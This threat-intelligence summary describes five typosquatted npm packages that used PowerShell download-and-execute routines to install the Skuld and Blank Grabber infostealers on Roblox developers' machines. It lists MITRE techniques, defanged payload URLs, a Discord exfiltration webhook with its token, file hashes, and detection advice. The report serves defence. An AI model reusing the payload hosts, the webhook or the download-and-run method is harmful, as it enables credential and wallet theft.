Keypoints
- Five malicious npm packages (node-dlls, ro.dll, autoadv, [email protected], [email protected]) were published to typosquat legitimate modules.
- Packages contained highly obfuscated JavaScript that downloaded and executed external Windows binaries hosted on a GitHub repository.
- Malware deployed included Skuld infostealer (Go) and Blank Grabber (Python), both designed to extract browser credentials, Discord tokens, and wallet data.
- Download-and-execute flow used PowerShell commands (Invoke-WebRequest to save files and Start-Process to run them) enabling remote code execution.
- Exfiltration occurred over Discord webhooks and Telegram; threat actor used public platforms for hosting and C2 to evade detection.
- Over 320 downloads occurred before package removal, demonstrating supply chain risk via developer dependencies.
- Mitigations include careful package name verification, code review of dependencies, and runtime/install-time scanners (e.g., Socket CLI/GitHub app).
MITRE Techniques
- [T1195.002] Supply Chain Compromise – Threat actor injected malicious code into developer workflows by publishing typosquatted npm packages (‘The threat actor published typosquatted packages to deceive developers into installing Skuld infostealer and Blank Grabber malware.’)
- [T1036.005] Masquerading (Match Legitimate Name or Location) – Malicious packages mimicked legitimate module names to trick developers into installing them (‘typosquatted the popular node-dll package — downloaded over 35,800 times — by publishing a deceptive variant named node-dlls.’)
- [T1546.016] Event Triggered Execution (Installer Packages) – The npm package executed installer-like behavior by downloading and launching binaries via PowerShell during install/runtime (‘The function downloadAndRun was added to download the malicious executables and run them using PowerShell commands.’)
- [T1555.003] Credentials from Password Stores (Web Browsers) – Deployed infostealer targeted Chromium/Firefox-based browsers to extract saved credentials and cookies (‘Skuld infostealer… targeting applications like Discord, Chromium and Firefox-based browsers, and cryptocurrency wallets.’)
- [T1552.001] Unsecured Credentials (Credentials In Files) – Malware collected credentials and files from the host filesystem and stored artifacts for exfiltration (‘Blank Grabber is capable of extracting data like Discord tokens, browser passwords, cookies, cryptocurrency wallet details, as well as capture screenshots and webcam images.’)
- [T1567.004] Exfiltration Over Web Service (Exfiltration Over Webhook) – Stolen data was sent to attacker-controlled channels using Discord webhooks and Telegram (‘The stolen data is then sent to the threat actor via Discord webhooks or Telegram.’)
Indicators of Compromise
- [Malicious npm packages] Typosquatted packages used to deliver malware – [email protected], [email protected], and 3 more packages
- [Malicious URLs] Hosted payloads on GitHub raw URLs – hxxps://github[.]com/zvydev/code/raw/main/RobloxPlayerLauncher.exe, hxxps://github[.]com/zvydev/code/raw/main/cmd.exe, and the repository hxxps://github[.]com/zvydev/code
- [C2 / Exfiltration] Communication endpoints used to receive stolen data – hxxps://discord[.]com/api/webhooks/1298438839865577564/LcdRm0rKPE01ApFPl9RQHGqhcuExeiqKGpghrB8Lv3iKniiyEa0mVBhFySte_oBx7wyQ
- [File hashes] Payload SHA256 hashes for detection/blocking – RobloxPlayerLauncher.exe: 9d60a15cf6779912cc49ce36597b2264f97071c4afc61c370454931083df2e3f, cmd.exe: b3ce55c72f4e23252235f9698bd6078880ceaca310ba16ee859a5a2d6cc39a9
The technical compromise began with typosquatted npm packages that impersonated legitimate Roblox developer modules. Each malicious package included heavily obfuscated JavaScript which defined URLs pointing to Windows executables hosted on a threat-controlled GitHub repository. During install or runtime the package invoked a download-and-execute routine—using PowerShell Invoke-WebRequest to save the binary and Start-Process (or equivalent exec calls) to run it—thereby achieving remote code execution without user consent.
Once executed, the downloaded binaries deployed commodity infostealers: Skuld (Go) and Blank Grabber (Python). Skuld targets browsers (Chromium/Firefox families), Discord, and crypto wallets to harvest credentials, cookies, and wallet data, and includes anti-debugging, AV disablement, and privilege escalation techniques. Blank Grabber offers configurable behaviors (disabling Defender, UAC bypasses, screenshot/webcam capture) and similarly extracts tokens, passwords, and other sensitive artifacts. Both families exfiltrated collected data to attacker channels via Discord webhooks and Telegram, leveraging trusted services to blend with legitimate traffic.
Detection and mitigation focus on preventing malicious packages from entering the build or runtime environment: verify package names and signatures, review third-party package code (look for obfuscation and exec/PowerShell download patterns), block known malicious URLs and hashes, and use dependency-time scanners or wrappers that analyze packages before writing to disk (for example, Socket’s CLI and GitHub app which scan npm installs and pull requests). Runtime protections should include restricting PowerShell/networking from build/install contexts and monitoring for webhook-based exfiltration patterns.
Read more: https://socket.dev/blog/roblox-developers-targeted-with-npm-packages-infected-with-infostealers